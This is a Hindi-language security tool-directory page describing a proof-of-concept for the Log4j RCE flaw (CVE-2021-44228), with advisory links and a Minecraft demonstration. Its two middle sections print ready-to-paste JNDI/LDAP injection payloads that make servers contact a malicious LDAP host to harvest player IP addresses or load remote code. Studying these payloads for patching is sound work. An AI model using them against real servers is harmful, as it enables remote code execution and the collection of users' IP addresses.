Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4J-RCE-Proof-Of-Concept — Log4j-RCE (CVE-2021-44228) अतिरिक्त जानकारी के साथ प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/hycrafthd/log4j-rce-proof-of-concept
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhycrafthd/log4j-rce-proof-of-concept

Log4J-RCE-Proof-Of-Concept

Log4j-RCE (CVE-2021-44228) अतिरिक्त जानकारी के साथ प्रूफ ऑफ कॉन्सेप्ट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
182314 साल पहलेKitploit द्वारा समीक्षित

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)

यह log4j rce का एक प्रूफ ऑफ कॉन्सेप्ट है।

CVE-2021-44228 के लिए कुछ लिंक यहाँ दिए गए हैं:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

यह बग लगभग सभी log4j2 और शायद log4j1 संस्करणों को प्रभावित करता है। उपयोग करने के लिए अनुशंसित संस्करण 2.15.0 है जो इस एक्सप्लॉइट को ठीक करता है।

माइनक्राफ्ट के साथ प्रदर्शन (जो log4j2 का उपयोग करता है)

  • माइनक्राफ्ट पर प्रभाव का विवरण यहाँ सूचीबद्ध है: https://twitter.com/slicedlime/status/1469150993527017483
  • माइनक्राफ्ट का लेख यहाँ है: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • माइनक्राफ्ट Forge के ठीक किए गए संस्करण: https://twitter.com/gigaherz/status/1469331288368861195
  • माइनक्राफ्ट Forge से विस्तृत लेख: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • माइनक्राफ्ट Fabric के ठीक किए गए संस्करण: https://twitter.com/slicedlime/status/1469192689904193537
  • माइनक्राफ्ट Paper के ठीक किए गए संस्करण: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • माइनक्राफ्ट Spigot के ठीक किए गए संस्करण: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • माइनक्राफ्ट Sponge के ठीक किए गए संस्करण: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

लैग या सीरियलाइज़्ड डेटा भेजना

  • चैट में ${jndi:ldap://127.0.0.1/e} पेस्ट करें। यदि पोर्ट 389 पर एक खुला सॉकेट है तो log4j कनेक्ट करने का प्रयास करता है और टाइमआउट होने तक आगे के संचार को अवरुद्ध कर देता है।
  • इस प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट का उपयोग करते समय, कंसोल में लॉग THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! दर्ज होगा जो ldap सर्वर से एक सीरियलाइज़्ड स्ट्रिंग ऑब्जेक्ट है।

image

  • इसके अतिरिक्त, दुर्भावनापूर्ण ldap सर्वर उन सभी ip पतों को प्राप्त करता है जहाँ संदेश लॉग किया जाता है। इसका मतलब है कि सर्वर पर खिलाड़ियों के ip पते इस एक्सप्लॉइट के माध्यम से एकत्र किए जा सकते हैं।

RCE

  • चैट में ${jndi:ldap://127.0.0.1/exe} पेस्ट करें। यदि -Dcom.sun.jndi.ldap.object.trustURLCodebase=true को true पर सेट किया गया है तो रिमोट कोड एक्ज़ीक्यूशन होगा।

image

  • सौभाग्य से, आधुनिक JDK डिफ़ॉल्ट रूप से रिमोट क्लास लोडिंग अक्षम कर देते हैं। (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • पुराने संस्करण अभी भी इसकी अनुमति दे सकते हैं!!

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है।

टूल डाउनलोड करें